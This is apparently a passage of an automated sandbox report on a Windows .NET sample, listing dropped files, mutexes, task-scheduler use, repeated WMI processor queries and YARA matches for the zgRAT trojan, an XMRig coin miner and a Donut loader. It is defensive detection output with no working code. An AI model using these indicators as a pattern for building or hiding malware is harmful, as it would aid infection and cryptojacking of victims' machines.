Source: zlONcFaXkc.exe, Program.cs

Large array initialization: Main: array initializer size 642620

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

Process Stats: CPU usage > 49%

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Detected potential crypto function

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9B8A1C44	0_2_00007FFD9B8A1C44
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9B8A1A51	0_2_00007FFD9B8A1A51
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9B8A3FFA	0_2_00007FFD9B8A3FFA
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9B971B44	0_2_00007FFD9B971B44
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9B973198	0_2_00007FFD9B973198
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9BA50140	0_2_00007FFD9BA50140
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8D6C22	1_2_00007FFD9B8D6C22
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8D5979	1_2_00007FFD9B8D5979
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8E1890	1_2_00007FFD9B8E1890
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8B8D50	1_2_00007FFD9B8B8D50
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8BA2E0	1_2_00007FFD9B8BA2E0
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8BE610	1_2_00007FFD9B8BE610
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8B8A48	1_2_00007FFD9B8B8A48
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8C5F09	1_2_00007FFD9B8C5F09
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8D5E76	1_2_00007FFD9B8D5E76
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B881C45	1_2_00007FFD9B881C45
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B881A51	1_2_00007FFD9B881A51
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B883FFA	1_2_00007FFD9B883FFA
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B955C61	1_2_00007FFD9B955C61
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA4792D	1_2_00007FFD9BA4792D
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA47469	1_2_00007FFD9BA47469
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA37299	1_2_00007FFD9BA37299
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3C9FB	1_2_00007FFD9BA3C9FB
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3C231	1_2_00007FFD9BA3C231
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3C985	1_2_00007FFD9BA3C985
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3B1A0	1_2_00007FFD9BA3B1A0
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA4E8FA	1_2_00007FFD9BA4E8FA
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3C126	1_2_00007FFD9BA3C126
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3C6A0	1_2_00007FFD9BA3C6A0
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA415F9	1_2_00007FFD9BA415F9
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA4E5C7	1_2_00007FFD9BA4E5C7
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3C4D3	1_2_00007FFD9BA3C4D3
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_000002A5B9B863BA	2_2_000002A5B9B863BA
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_000002A5B9B8678A	2_2_000002A5B9B8678A
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_000002A5B9B86BC2	2_2_000002A5B9B86BC2
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_000002A5B9B89E86	2_2_000002A5B9B89E86
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_000002A5B9B854DA	2_2_000002A5B9B854DA
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_000002A5B9B8762E	2_2_000002A5B9B8762E

One or more processes crash

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508

PE file does not import any functions

Source: Target.exe.0.dr	Static PE information: No import functions for PE file found
Source: zlONcFaXkc.exe	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: zlONcFaXkc.exe, 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLwbtkgrhgw.dll" vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1666984608.000001DFA9511000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLwbtkgrhgw.dll" vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLwbtkgrhgw.dll" vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe	Binary or memory string: OriginalFilenameZldnf.exe" vs zlONcFaXkc.exe

Yara signature match

Source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000002.00000002.2015231668.000002A5B9B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: Target.exe PID: 7384, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: AddInProcess.exe PID: 7492, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: zlONcFaXkc.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Target.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@103/309@24/25

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

File created: C:\Users\user\AppData\Roaming\IsFixedSize

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Mutant created: \Sessions\1\BaseNamedObjects\cd738f7ec36d311b107bd6ec4b05793a
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Mutant created: \Sessions\1\BaseNamedObjects\444118017aca01d9d0dde7
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7508

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

File created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe

Jump to behavior

Source: zlONcFaXkc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: zlONcFaXkc.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
